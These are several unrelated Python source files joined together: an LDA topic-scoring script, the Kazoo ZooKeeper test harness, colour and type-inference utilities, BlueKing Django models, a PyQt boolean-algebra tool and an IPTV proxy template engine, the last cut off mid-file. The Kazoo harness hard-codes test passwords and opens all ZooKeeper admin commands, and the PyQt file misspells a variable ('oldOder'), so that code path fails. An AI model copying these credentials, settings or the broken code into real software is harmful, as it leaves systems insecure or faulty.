# with 5 components, and we find an interpretable output.
# To make a final decision, we will assess the performance of the topic scores
# on predictive models.
################################
# output dataset with LDA scores
################################
for cp in [5, 10]:
fname = 'lda-models/2021-13-mai-lda-model-stemmed-ncomp-' + str(cp) + '.joblib'
lda_model = load(fname)
thread_topics = lda_model.transform(tf)
# thread_topics.shape # (177277, 10) good
topic_df = pd.DataFrame(thread_topics)
new_cols = pd.Series(range(cp)).apply(lambda x: 'topic_'+str(x)).tolist()
topic_df.columns = new_cols
# rename the index to be like the original df
topic_df.index = df.index
# concatenate
#df_with_topics = pd.concat([df, topic_df], axis = 1)
#print(df_with_topics.shape) # (177277, 24)
# write as csv
op_fname = 'nlp-data/2021-15-mai-df_topics_' + str(cp) + '.csv'
print(op_fname)
topic_df.to_csv(op_fname, index=True) |
"""Kazoo testing harnesses"""
import logging
import os
import uuid
import unittest
from kazoo import python2atexit as atexit
from kazoo.client import KazooClient
from kazoo.exceptions import KazooException
from kazoo.protocol.connection import _CONNECTION_DROP, _SESSION_EXPIRED
from kazoo.protocol.states import (
KazooState
)
from kazoo.testing.common import ZookeeperCluster
log = logging.getLogger(__name__)
CLUSTER = None
CLUSTER_CONF = None
CLUSTER_DEFAULTS = {
"ZOOKEEPER_PORT_OFFSET": 20000,
"ZOOKEEPER_CLUSTER_SIZE": 3,
"ZOOKEEPER_OBSERVER_START_ID": -1,
}
def get_global_cluster():
global CLUSTER, CLUSTER_CONF
cluster_conf = {
k: os.environ.get(k, CLUSTER_DEFAULTS.get(k))
for k in ["ZOOKEEPER_PATH",
"ZOOKEEPER_CLASSPATH",
"ZOOKEEPER_PORT_OFFSET",
"ZOOKEEPER_CLUSTER_SIZE",
"ZOOKEEPER_VERSION",
"ZOOKEEPER_OBSERVER_START_ID",
"ZOOKEEPER_JAAS_AUTH"]
}
if CLUSTER is not None:
if CLUSTER_CONF == cluster_conf:
return CLUSTER
else:
log.info('Config change detected. Reconfiguring cluster...')
CLUSTER.terminate()
CLUSTER = None
# Create a new cluster
ZK_HOME = cluster_conf.get("ZOOKEEPER_PATH")
ZK_CLASSPATH = cluster_conf.get("ZOOKEEPER_CLASSPATH")
ZK_PORT_OFFSET = int(cluster_conf.get("ZOOKEEPER_PORT_OFFSET"))
ZK_CLUSTER_SIZE = int(cluster_conf.get("ZOOKEEPER_CLUSTER_SIZE"))
ZK_VERSION = cluster_conf.get("ZOOKEEPER_VERSION")
if '-' in ZK_VERSION:
# Ignore pre-release markers like -alpha
ZK_VERSION = ZK_VERSION.split('-')[0]
ZK_VERSION = tuple([int(n) for n in ZK_VERSION.split('.')])
ZK_OBSERVER_START_ID = int(cluster_conf.get("ZOOKEEPER_OBSERVER_START_ID"))
assert ZK_HOME or ZK_CLASSPATH or ZK_VERSION, (
"Either ZOOKEEPER_PATH or ZOOKEEPER_CLASSPATH or "
"ZOOKEEPER_VERSION environment variable must be defined.\n"
"For deb package installations this is /usr/share/java")
if ZK_VERSION >= (3, 5):
additional_configuration_entries = [
"4lw.commands.whitelist=*",
"reconfigEnabled=true"
]
# If defined, this sets the superuser password to "<PASSWORD>"
additional_java_system_properties = [
"-Dzookeeper.DigestAuthenticationProvider.superDigest="
"super:D/InIHSb7yEEbrWz8b9l71RjZJU="
]
else:
additional_configuration_entries = []
additional_java_system_properties = []
ZOOKEEPER_JAAS_AUTH = cluster_conf.get("ZOOKEEPER_JAAS_AUTH")
if ZOOKEEPER_JAAS_AUTH == "digest":
jaas_config = """
Server {
org.apache.zookeeper.server.auth.DigestLoginModule required
user_super="super_secret"
user_jaasuser="jaas_password";
};"""
elif ZOOKEEPER_JAAS_AUTH == "gssapi":
# Configure Zookeeper to use our test KDC.
additional_java_system_properties += [
"-Djava.security.krb5.conf=%s" % os.path.expandvars(
"${KRB5_CONFIG}"
),
"-Dsun.security.krb5.debug=true",
]
jaas_config = """
Server {
com.sun.security.auth.module.Krb5LoginModule required
debug=true
isInitiator=false
useKeyTab=true
keyTab="%s"
storeKey=true
useTicketCache=false
principal="zookeeper/127.0.0.1@K<EMAIL>";
};""" % os.path.expandvars("${KRB5_TEST_ENV}/server.keytab")
else:
jaas_config = None
CLUSTER = ZookeeperCluster(
install_path=ZK_HOME,
classpath=ZK_CLASSPATH,
port_offset=ZK_PORT_OFFSET,
size=ZK_CLUSTER_SIZE,
observer_start_id=ZK_OBSERVER_START_ID,
configuration_entries=additional_configuration_entries,
java_system_properties=additional_java_system_properties,
jaas_config=jaas_config
)
CLUSTER_CONF = cluster_conf
atexit.register(lambda cluster: cluster.terminate(), CLUSTER)
return CLUSTER
class KazooTestHarness(unittest.TestCase):
"""Harness for testing code that uses Kazoo
This object can be used directly or as a mixin. It supports starting
and stopping a complete ZooKeeper cluster locally and provides an
API for simulating errors and expiring sessions.
Example::
class MyTestCase(KazooTestHarness):
def setUp(self):
self.setup_zookeeper()
# additional test setup
def tearDown(self):
self.teardown_zookeeper()
def test_something(self):
something_that_needs_a_kazoo_client(self.client)
def test_something_else(self):
something_that_needs_zk_servers(self.servers)
"""
DEFAULT_CLIENT_TIMEOUT = 15
def __init__(self, *args, **kw):
super(KazooTestHarness, self).__init__(*args, **kw)
self.client = None
self._clients = []
@property
def cluster(self):
return get_global_cluster()
@property
def servers(self):
return ",".join([s.address for s in self.cluster])
def _get_nonchroot_client(self):
c = KazooClient(self.servers)
self._clients.append(c)
return c
def _get_client(self, **client_options):
if 'timeout' not in client_options:
client_options['timeout'] = self.DEFAULT_CLIENT_TIMEOUT
c = KazooClient(self.hosts, **client_options)
self._clients.append(c)
return c
def lose_connection(self, event_factory):
"""Force client to lose connection with server"""
self.__break_connection(_CONNECTION_DROP, KazooState.SUSPENDED,
event_factory)
def expire_session(self, event_factory):
"""Force ZK to expire a client session"""
self.__break_connection(_SESSION_EXPIRED, KazooState.LOST,
event_factory)
def setup_zookeeper(self, **client_options):
"""Create a ZK cluster and chrooted :class:`KazooClient`
The cluster will only be created on the first invocation and won't be
fully torn down until exit.
"""
do_start = False
for s in self.cluster:
if not s.running:
do_start = True
if do_start:
self.cluster.start()
namespace = "/kazootests" + uuid.uuid4().hex
self.hosts = self.servers + namespace
if 'timeout' not in client_options:
client_options['timeout'] = self.DEFAULT_CLIENT_TIMEOUT
self.client = self._get_client(**client_options)
self.client.start()
self.client.ensure_path("/")
def teardown_zookeeper(self):
"""Reset and cleanup the zookeeper cluster that was started."""
while self._clients:
c = self._clients.pop()
try:
c.stop()
except KazooException:
log.exception("Failed stopping client %s", c)
finally:
c.close()
self.client = None
def __break_connection(self, break_event, expected_state, event_factory):
"""Break ZooKeeper connection using the specified event."""
lost = event_factory()
safe = event_factory()
def watch_loss(state):
if state == expected_state:
lost.set()
elif lost.is_set() and state == KazooState.CONNECTED:
safe.set()
return True
self.client.add_listener(watch_loss)
self.client._call(break_event, None)
lost.wait(5)
if not lost.isSet():
raise Exception("Failed to get notified of broken connection.")
safe.wait(15)
if not safe.isSet():
raise Exception("Failed to see client reconnect.")
self.client.retry(self.client.get_async, '/')
class KazooTestCase(KazooTestHarness):
def setUp(self):
self.setup_zookeeper()
def tearDown(self):
self.teardown_zookeeper()
|
<reponame>NicoleEic/projects
import numpy as np
import sys
from my import mymodule
import matplotlib.pyplot as plt
import pdb
import logging as log
luminance_factors = {'R': 0.2126, 'G': 0.7152, 'B': 0.0722}
def get_luminance(colour, luminance_factors={'R': 0.2126, 'G': 0.7152, 'B': 0.0722}):
'''determine the perceived luminance value for a rgb colour'''
L = luminance_factors['R'] * colour[0] + luminance_factors['G'] * colour[1] + luminance_factors['B'] * colour[2]
return L
def rgb2yuv(colour):
'''convert rgb colour to YUV colour space'''
factors = np.array([[0.29900, -0.16874, 0.50000],
[0.58700, -0.33126, -0.41869],
[0.11400, 0.50000, -0.08131]])
yuv = np.dot(colour, factors)
return yuv
def diff_colours(c1, c2):
'''compute the perceived distance of two colours in RGB space'''
diff = np.sqrt(3 * (c1[0] - c2[0])**2 + 4 * (c1[1] - c2[1])**2 + 2 * (c1[2] - c2[2])**2)
return diff
def plot_colours(colour_list):
'''generate patches of a list of colours'''
colour_list = [tuple(col) for col in colour_list]
n_cols, n_rows = mymodule.get_subplots_matrix(len(colour_list))
fig = plt.figure()
for ind, my_colour in enumerate(colour_list):
ax = fig.add_subplot(n_rows, n_cols, ind + 1)
plt.plot([0, 1], c=my_colour)
plt.text(0.5, 0.5, f'{ind}: {my_colour}')
ax.set_facecolor(my_colour)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show()
def isoluminance_colours(L=0.5, n_colours=10, min_diff_col=0.5, verbose=1):
'''Get a list of RGB colours that are matched in luminance.
L: desired luminance (ranges from 0 to 1)
n_colours: desired number of colours generated
min_diff_col: minimal difference in RGB space across all colours
verbose: set to 1 to print verbose messages
'''
# enable verboseprint function
verboseprint = print if verbose else lambda *a, **k: None
# mapping of index within rgb vector
rgb_map = dict([(0, 'R'), (1, 'G'), (2, 'B')])
# step size for initial index in staircase
step_size = (1 / (n_colours / 3)) * 0.9
# step size for 2nd index in staircase
step_staircase = 0.0001
# initialize output list
new_colours_list = np.empty((0, 3), float)
# initialize looping index for 1st index
ind = 0
running = 1
while running:
# exit while loop when 1st index has looped from 0 to 1
if ind * step_size > 1:
verboseprint('range of 1st index exceeded')
running = 0
else:
# loop over R, G, B as 1st index to change
for ind_fix in [0, 1, 2]:
# increase 1st index by ind * step_size
my_colour = np.array([0., 0., 0.])
my_colour[ind_fix] = ind * step_size
verboseprint('new colour: ', my_colour)
# determine which two colours to update
ind_update = np.where(np.array([0, 1, 2]) != ind_fix)[0]
# check if a matching colour can be found with the initial value
max_colour = np.copy(my_colour)
max_colour[ind_update[0]] = 1
max_colour[ind_update[1]] = 1
min_colour = np.copy(my_colour)
min_colour[ind_update[0]] = 0
min_colour[ind_update[1]] = 0
# if no matching colour can be found, continue with next while loop
if (get_luminance(max_colour) < L) or (get_luminance(min_colour) > L):
verboseprint('initial values out of range')
ind = ind + 1
continue
# loop over 2nd and 3rd index which one is set first
for ind_pair in [[ind_update[0], ind_update[1]], [ind_update[1], ind_update[0]]]:
up_colour = np.copy(my_colour)
down_colour = np.copy(my_colour)
searching = 1
while searching:
# in/decrease second index
up_colour[ind_pair[0]] = up_colour[ind_pair[0]] + step_staircase
down_colour[ind_pair[0]] = down_colour[ind_pair[0]] - step_staircase
if up_colour[ind_pair[0]] > 1:
# exit while loop when 2nd index has looped from 0 to 1
verboseprint('2nd index out of range')
searching = 0
else:
for col in up_colour, down_colour:
# update 3rd index based on luminance value
col[ind_pair[1]] = (L - luminance_factors[rgb_map[ind_fix]] * col[ind_fix] - luminance_factors[rgb_map[ind_pair[0]]] * col[ind_pair[0]]) / luminance_factors[rgb_map[ind_pair[1]]]
# determine difference of new colour with the rest of the list
if len(new_colours_list) > 0:
diff_C = np.apply_along_axis(diff_colours, 1, new_colours_list, col)
else:
diff_C = 10
# add new colour when not too similar and within 0 1
if np.all(diff_C > min_diff_col) and not (np.any(col < 0) or np.any(col > 1)) and running:
verboseprint(f'{my_colour}, found: {col}')
verboseprint(f'difference in colour: {diff_C}')
# add new colour
new_colours_list = np.vstack((new_colours_list, col))
# check that colour has not been added before
new_colours_list = [tuple(col) for col in new_colours_list]
new_colours_list = np.unique(new_colours_list, axis=0)
# exit while loop for this 2nd index
searching = 0
# exit while loops when list is complete
if len(new_colours_list) == n_colours:
running = 0
# update outer while loop index
ind = ind + 1
new_colours_list = np.around(new_colours_list, 2)
print(new_colours_list)
if len(new_colours_list) < n_colours:
print('not enough colours generated. Decrease min_diff_col.')
else:
print('done!')
return new_colours_list
if __name__ == "__main__":
import sys
isoluminance_colours(np.float(sys.argv[1]), np.int(sys.argv[2]))
|
import ast
import sys
import copy
from collections import namedtuple
from rightarrow.annotations import *
class Constraint(object):
"A type constraint of the form `S <: T`"
def __init__(self, subtype, supertype):
self.subtype = subtype
self.supertype = supertype
def __str__(self):
return '%s <: %s' % (self.subtype, self.supertype)
def substitute(self, substitution):
return Constraint(subtype = self.subtype.substitute(substitution),
supertype = self.supertype.substitute(substitution))
class ConstrainedType(object):
"A type along with a set of constraints, of the form `T & [S1 <: T1, ...]`"
def __init__(self, type=None, constraints=None):
self.type = type
self.constraints = constraints or []
class ConstrainedEnv(object):
"""
An environment mapping variables to types, along with some constraints, and a return type.
One way to write it might be like...
T_return & { x: T_x, f: T_f, ... } & [S1 <: T1, ...]
"""
def __init__(self, env=None, constraints=None, return_type=None):
self.env = env or {}
self.constraints = constraints or []
self.return_type = return_type
def substitute(self, substitution):
return ConstrainedEnv(env = dict([(key, ty.substitute(substitution)) for key, ty in self.env.items()]),
constraints = [constraint.substitute(substitution) for constraint in self.constraints],
return_type = None if self.return_type is None else self.return_type.substitute(substitution))
def pretty(self):
return ("Env:\n\t%(bindings)s\n\nConstraints:\n\t%(constraints)s\n\nResult:\n\t%(result)s" %
dict(bindings = '\n\t'.join(['%s: %s' % (var, ty) for var, ty in self.env.items()]),
constraints = '\n\t'.join([str(c) for c in self.constraints]),
result = self.return_type))
def constraints(pyast, env=None):
env = env or {}
if isinstance(pyast, ast.Module) or isinstance(pyast, ast.Interactive):
env = copy.copy(env)
constraints = []
for stmt in pyast.body:
cs = constraints_stmt(stmt, env=env)
env.update(cs.env)
constraints += cs.constraints
return ConstrainedEnv(env=env, constraints=constraints)
elif isinstance(pyast, ast.Expression):
expr_ty = constraints_expr(pyast.body, env=env)
return ConstrainedEnv(env=env, constraints=expr_ty.constraints)
else:
raise Exception('Unknown ast node: %s' % pyast)
def extended_env(env, more_env):
new_env = copy.copy(env)
new_env.update(more_env)
return new_env
# Note that this is rather different in Python 3 - and better!
def fn_env(arguments):
new_env = {}
for arg in arguments.args:
if isinstance(arg, ast.Name) and isinstance(arg.ctx, ast.Param):
new_env[arg.id] = fresh() # TODO: ??
else:
raise Exception('Arg is not a name in Param context!? %s' % arg)
if arguments.vararg:
new_env[arguments.vararg] = fresh() # TODO: sub/superty of list
if arguments.kwarg:
new_env[arguments.kwarg] = fresh() # TODO: sub/superty of dict
return new_env
def union(left, right):
if left is None:
return right
elif right is None:
return left
else:
return Union([right, left])
def constraints_stmt(stmt, env=None):
"""
Since a statement may define new names or return an expression ,
the constraints that result are in a
ConstrainedEnv mapping names to types, with constraints, and maybe
having a return type (which is a constrained type)
"""
env = env or {}
if isinstance(stmt, ast.FunctionDef):
arg_env = fn_env(stmt.args)
body_env = extended_env(env, arg_env)
constraints = []
return_type = None # TODO: should be fresh and constrained?
for body_stmt in stmt.body:
cs = constraints_stmt(body_stmt, env=body_env)
body_env.update(cs.env)
constraints += cs.constraints
return_type = union(return_type, cs.return_type)
env[stmt.name] = Function(arg_types=[arg_env[arg.id] for arg in stmt.args.args],
return_type=return_type)
return ConstrainedEnv(env=env, constraints=constraints)
elif isinstance(stmt, ast.Expr):
constrained_ty = constraints_expr(stmt.value, env=env)
return ConstrainedEnv(env=env, constraints=constrained_ty.constraints)
elif isinstance(stmt, ast.Return):
if stmt.value:
expr_result = constraints_expr(stmt.value, env=env)
return ConstrainedEnv(env=env, constraints=expr_result.constraints, return_type=expr_result.type)
else:
result = fresh()
return ConstrainedEnv(env=env, constraints=[Constraint(subtype=result, supertype=NamedType('NoneType'))])
elif isinstance(stmt, ast.Assign):
if len(stmt.targets) > 1:
raise NotImplementedError('Cannot generate constraints for multi-target assignments yet')
expr_result = constraints_expr(stmt.value, env=env)
target = stmt.targets[0].id
# For an assignment, we actually generate a fresh variable so that it can be the union of all things assigned
# to it. We do not do any typestate funkiness.
if target not in env:
env[target] = fresh()
return ConstrainedEnv(env=env,
constraints = expr_result.constraints + [Constraint(subtype=expr_result.type,
supertype=env[target])])
else:
raise NotImplementedError('Constraint gen for stmt %s' % stmt)
def constraints_expr(expr, env=None):
env = env or {}
if isinstance(expr, ast.Name) and isinstance(expr.ctx, ast.Load):
if expr.id in ['False', 'True']: # Unlike other literals, these are actually just global identifiers
return ConstrainedType(type=bool_t)
elif expr.id in env:
return ConstrainedType(type=env[expr.id])
else:
raise Exception('Variable not found in environment: %s' % expr.id)
elif isinstance(expr, ast.Num):
# The python ast module already chose the type of the num
if isinstance(expr.n, int):
return ConstrainedType(type=int_t)
elif isinstance(expr.n, long):
return ConstrainedType(type=long_t)
elif isinstance(expr.n, float):
return ConstrainedType(type=float_t)
elif isinstance(expr.n, complex):
return ConstrainedType(type=complex_t)
elif isinstance(expr, ast.Str):
return ConstrainedType(type=str_t)
elif isinstance(expr, ast.List):
return ConstrainedType(type=List(elem_ty=fresh()))
elif isinstance(expr, ast.BinOp):
left = constraints_expr(expr.left, env=env)
right = constraints_expr(expr.right, env=env)
ty = fresh()
if isinstance(expr.op, ast.Mult):
# TODO: consider whether all types should match (forces coercions to be explicit; a good thing)
# Note: though strings and bools can be used in mult, forget it!
op_constraints = [Constraint(subtype=left.type, supertype=numeric_t),
Constraint(subtype=right.type, supertype=numeric_t),
Constraint(subtype=ty, supertype=numeric_t)]
else:
raise NotImplementedError('BinOp') # TODO: just use function application constraint gen
# TODO: return type should actually be fancier
return ConstrainedType(type=ty, constraints=left.constraints+right.constraints+op_constraints)
else:
raise NotImplementedError('Constraint gen for %s' % expr)
if __name__ == '__main__':
with open(sys.argv[1]) as fh:
proggy = ast.parse(fh.read())
print ast.dump(proggy)
print constraints(proggy).pretty()
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云(BlueKing) available.
Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
from django.db import models
import time
from common.log import logger
class ExcRecord(models.Model):
ip = models.CharField(u"IP", max_length=20)
cmd = models.CharField(u"CMD", max_length=100)
result = models.CharField(u"RESULT", max_length=10)
exctime = models.CharField(u"EXCTIME", max_length=50)
class UserInfo(models.Model):
username = models.CharField(u'UserName', max_length=30)
cname = models.CharField(u'UserName', max_length=30)
rolename = models.CharField(u'RoleName', max_length=20)
class LoginInfo(models.Model):
username = models.CharField(u'UserName', max_length=30)
date = models.CharField(u'Date', max_length=30)
bk_token = models.CharField(u'Date', max_length=100)
#存储漏扫任务数据
class VulnScanTasks(models.Model):
vulnscan_taskname = models.CharField(u'漏扫任务名称',max_length=50)
version = models.CharField(u'工具版本',max_length=10)
supplier = models.CharField(u'扫描工具',max_length=20)
iplist = models.CharField(u'扫描目标',max_length=1000)
creator = models.CharField(u'创建人',max_length=20)
create_time = models.DateTimeField(u'创建时间')
#finish_time = models.DateTimeField(u'结束时间')
soc_task_name = models.CharField(u'SOC漏扫任务名称',max_length=50)
soc_task_resultid = models.CharField(u'SOC任务ID',max_length=50)
soc_task_status = models.CharField(u'SOC任务状态',max_length=10)
soc_task_progress = models.CharField(u'SOC任务进度',max_length=10)
has_report = models.BooleanField(u"是否已出报告", default=False)
def __unicode__(self):
return self.vulnscan_taskname
class Meta:
verbose_name = u"漏扫任务"
class LogsManager(models.Manager):
def save_data(self, data):
"""
保存操作记录数据
"""
try:
Logs.objects.create(
ip=data[0],
operator=data[1],
operation=data[2],
operate_result=data[3],
operate_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
)
result = {'result': True, 'message': u"保存成功"}
except Exception, e:
logger.error(u"save_data %s" % e)
result = {'result': False, 'message': u"保存失败, %s" % e}
return result
class Logs(models.Model):
"""
存储历史操作记录数据
"""
ip = models.CharField('ip', max_length=64, blank=True, null=True)
operator = models.CharField(u'操作人', max_length=64)
operation = models.CharField(u'执行命令', max_length=64)
operate_result = models.BooleanField(u'执行结果')
operate_time = models.DateTimeField(u"执行时间")
objects = LogsManager()
def __unicode__(self):
return self.ip
class Meta:
verbose_name = u"历史操作记录"
|
<filename>T3Window.py
# Created by <NAME>'
# https://github.com/alxxlc/Boolean-Algebra-Toolbox
# Test Equation: (AVB') (AVCVD') (A+B+D')
import sys
from PyQt5 import QtCore, QtWidgets, uic
from ttConverter import *
from ttGenerator import *
import pyperclip
form_class = uic.loadUiType("T3Window.ui")[0]
eqConverter = ttConverter()
tableGenerator = ttGenerator()
oldOrder = "suffix"
newOrder = "prefix"
class MyWindowClass(QtWidgets.QMainWindow, form_class):
def __init__(self, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
self.setupUi(self)
# Set symbols in eqConverter object equal to combobox symbols.
eqConverter.changeOr(False, self.oldOrCombo.currentText(), self.newOrCombo.currentText())
eqConverter.changeAnd(False, True, self.oldAndCombo.currentText(), self.newAndCombo.currentText())
eqConverter.changeNot(False, self.oldNotCombo.currentText(), oldOrder, self.newNotCombo.currentText(), newOrder)
# Bind the event listener to the event handler. (convertBtn.clicked listen to convertBtn_Clicked() function)
self.convertBtn.clicked.connect(self.convertBtn_Clicked)
self.pasteBtn.clicked.connect(self.pasteBtn_Clicked)
self.copyBtn.clicked.connect(self.copyBtn_Clicked)
self.autoBtn.clicked.connect(self.autoBtn_Clicked)
#Listeners for combo box changes
self.oldOrCombo.currentIndexChanged.connect(self.orCombo_Changed)
self.newOrCombo.currentIndexChanged.connect(self.orCombo_Changed)
self.oldAndCombo.currentIndexChanged.connect(self.andCombo_Changed)
self.newAndCombo.currentIndexChanged.connect(self.andCombo_Changed)
self.oldNotCombo.currentIndexChanged.connect(self.notCombo_Changed)
self.newNotCombo.currentIndexChanged.connect(self.notCombo_Changed)
self.oldNotOrderCombo.currentIndexChanged.connect(self.notCombo_Changed)
self.newNotOrderCombo.currentIndexChanged.connect(self.notCombo_Changed)
# DEBUGGING BUTTONS #
self.testStringBtn.clicked.connect(self.testStringBtn_Clicked)
###############
# CONVERT TAB #
###############
def convertBtn_Clicked(self):
self.newEqTBox.setPlainText(eqConverter.convertEquation(self.oldEqTBox.toPlainText()))
def pasteBtn_Clicked(self):
self.oldEqTBox.setPlainText(pyperclip.paste())
def copyBtn_Clicked(self):
pyperclip.copy(self.newEqTBox.toPlainText())
def autoBtn_Clicked(self):
self.oldEqTBox.setPlainText(pyperclip.paste())
self.newEqTBox.setPlainText(eqConverter.convertEquation(self.oldEqTBox.toPlainText()))
pyperclip.copy(self.newEqTBox.toPlainText())
##############
# CONFIG TAB #
##############
def orCombo_Changed(self):
if self.oldOrCombo.currentText() == self.newOrCombo.currentText():
eqConverter.changeOr(False, self.oldOrCombo.currentText(), self.newOrCombo.currentText())
else:
eqConverter.changeOr(True, self.oldOrCombo.currentText(), self.newOrCombo.currentText())
def andCombo_Changed(self):
if self.oldAndCombo.currentText() == self.newAndCombo.currentText():
eqConverter.changeAnd(False, True, self.oldAndCombo.currentText(), self.newAndCombo.currentText())
else:
eqConverter.changeAnd(True, True, self.oldAndCombo.currentText(), self.newAndCombo.currentText())
def notCombo_Changed(self):
if self.oldNotOrderCombo.currentText() == "Before":
oldOrder = "prefix"
elif self.oldNotOrderCombo.currentText() == "After":
oldOrder = "suffix"
if self.newNotOrderCombo.currentText() == "Before":
newOrder = "prefix"
elif self.newNotOrderCombo.currentText() == "After":
newOrder = "suffix"
if self.oldNotCombo.currentText() == self.newNotCombo.currentText():
eqConverter.changeNot(False, self.oldNotCombo.currentText(), oldOder, self.newNotCombo.currentText(), newOrder)
else:
eqConverter.changeNot(True, self.oldNotCombo.currentText(), oldOder, self.newNotCombo.currentText(), newOrder)
###########
# TESTING #
###########
def testStringBtn_Clicked(self):
self.oldEqTBox.setPlainText("(AVB') (AVCVD') (A+B+D')")
app = QtWidgets.QApplication(sys.argv)
myWindow = MyWindowClass(None)
myWindow.show()
app.exec_() |
import logging
from abc import ABC
from abc import abstractmethod
from iptv_proxy.providers import ProvidersController
logger = logging.getLogger(__name__)
class ProviderHTMLTemplateEngine(ABC):
__slots__ = []
_provider_name = None
@classmethod
@abstractmethod
def render_configuration_template(
cls, environment, configuration, active_providers_map_class
):
pass
@classmethod
@abstractmethod
def render_iptv_proxy_script_configuration_clear_template(cls, environment):
pass
@classmethod
@abstractmethod
def render_iptv_proxy_script_configuration_declarations_template(cls, environment):
pass
@classmethod
@abstractmethod
def render_iptv_proxy_script_configuration_init_template(cls, environment):
pass
@classmethod
@abstractmethod
def render_iptv_proxy_script_configuration_reset_template(cls, environment):
pass
@classmethod
def render_iptv_proxy_script_configuration_toggle_password_template(
cls, environment
):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
iptv_proxy_script_configuration_provider_toggle_password_template = environment.get_template(
'iptv_proxy_script_configuration_provider_toggle_password.js'
)
iptv_proxy_script_configuration_provider_toggle_password_template_fields = {
'provider_name_camel_case': '{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
provider_map_class.constants_class().PROVIDER_NAME[1:],
)
}
return iptv_proxy_script_configuration_provider_toggle_password_template.render(
iptv_proxy_script_configuration_provider_toggle_password_template_fields
).lstrip()
@classmethod
@abstractmethod
def render_iptv_proxy_script_configuration_update_template(cls, environment):
pass
class XtreamCodesProviderHTMLTemplateEngine(ProviderHTMLTemplateEngine):
__slots__ = []
@classmethod
def render_configuration_template(
cls, environment, configuration, active_providers_map_class
):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
configuration_xstream_provider_template = environment.get_template(
'configuration_xstream_provider.html'
)
configuration_xstream_provider_template_fields = dict(
provider_name_camel_case='{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
provider_map_class.constants_class().PROVIDER_NAME[1:],
),
provider_name_pascal_case=provider_map_class.constants_class().PROVIDER_NAME,
configuration_provider_url='',
configuration_provider_username='',
configuration_provider_password='',
configuration_provider_playlist_protocol_hls_selected='',
configuration_provider_playlist_protocol_mpegts_selected='',
configuration_provider_playlist_type_static_selected='',
configuration_provider_playlist_type_dynamic_selected='',
configuration_provider_epg_source_provider_selected='',
configuration_provider_epg_source_other_selected='',
configuration_provider_epg_url='',
)
configuration_xstream_provider_template_fields[
'configuration_provider_active'
] = (
'checked="checked"'
if cls._provider_name in active_providers_map_class
else ''
)
if '{0}_URL'.format(cls._provider_name.upper()) in configuration:
configuration_xstream_provider_template_fields[
'configuration_provider_url'
] = configuration['{0}_URL'.format(cls._provider_name.upper())]
if '{0}_USERNAME'.format(cls._provider_name.upper()) in configuration:
configuration_xstream_provider_template_fields[
'configuration_provider_username'
] = configuration['{0}_USERNAME'.format(cls._provider_name.upper())]
if '{0}_PASSWORD'.format(cls._provider_name.upper()) in configuration:
configuration_xstream_provider_template_fields[
'configuration_provider_password'
] = configuration['{0}_PASSWORD'.format(cls._provider_name.upper())]
if '{0}_PLAYLIST_PROTOCOL'.format(cls._provider_name.upper()) in configuration:
if (
configuration[
'{0}_PLAYLIST_PROTOCOL'.format(cls._provider_name.upper())
].lower()
== 'hls'
):
configuration_xstream_provider_template_fields[
'configuration_provider_playlist_protocol_hls_selected'
] = 'selected="selected" '
elif (
configuration[
'{0}_PLAYLIST_PROTOCOL'.format(cls._provider_name.upper())
].lower()
== 'mpegts'
):
configuration_xstream_provider_template_fields[
'configuration_provider_playlist_protocol_mpegts_selected'
] = 'selected="selected" '
if '{0}_PLAYLIST_TYPE'.format(cls._provider_name.upper()) in configuration:
if (
configuration[
'{0}_PLAYLIST_TYPE'.format(cls._provider_name.upper())
].lower()
== 'dynamic'
):
configuration_xstream_provider_template_fields[
'configuration_provider_playlist_type_dynamic_selected'
] = 'selected="selected" '
elif (
configuration[
'{0}_PLAYLIST_TYPE'.format(cls._provider_name.upper())
].lower()
== 'static'
):
configuration_xstream_provider_template_fields[
'configuration_provider_playlist_type_static_selected'
] = 'selected="selected" '
if '{0}_EPG_SOURCE'.format(cls._provider_name.upper()) in configuration:
if (
configuration[
'{0}_EPG_SOURCE'.format(cls._provider_name.upper())
].lower()
== 'other'
):
configuration_xstream_provider_template_fields[
'configuration_provider_epg_source_other_selected'
] = 'selected="selected" '
elif (
configuration[
'{0}_EPG_SOURCE'.format(cls._provider_name.upper())
].lower()
== cls._provider_name
):
configuration_xstream_provider_template_fields[
'configuration_provider_epg_source_provider_selected'
] = 'selected="selected" '
if '{0}_EPG_URL'.format(cls._provider_name.upper()) in configuration:
if (
configuration['{0}_EPG_URL'.format(cls._provider_name.upper())]
is not None
):
configuration_xstream_provider_template_fields[
'configuration_provider_epg_url'
] = configuration['{0}_EPG_URL'.format(cls._provider_name.upper())]
return {
provider_map_class.constants_class().PROVIDER_NAME: configuration_xstream_provider_template.render(
configuration_xstream_provider_template_fields
)
}
@classmethod
def render_iptv_proxy_script_configuration_clear_template(cls, environment):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
iptv_proxy_script_configuration_xstream_provider_clear_template = environment.get_template(
'iptv_proxy_script_configuration_xstream_provider_clear.js'
)
iptv_proxy_script_configuration_xstream_provider_clear_template_fields = {
'provider_name_camel_case': '{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
provider_map_class.constants_class().PROVIDER_NAME[1:],
)
}
return iptv_proxy_script_configuration_xstream_provider_clear_template.render(
iptv_proxy_script_configuration_xstream_provider_clear_template_fields
).split('\n')
@classmethod
def render_iptv_proxy_script_configuration_declarations_template(cls, environment):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
iptv_proxy_script_configuration_xstream_provider_declarations_template = environment.get_template(
'iptv_proxy_script_configuration_xstream_provider_declarations.js'
)
iptv_proxy_script_configuration_xstream_provider_declarations_template_fields = {
'provider_name_camel_case': '{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
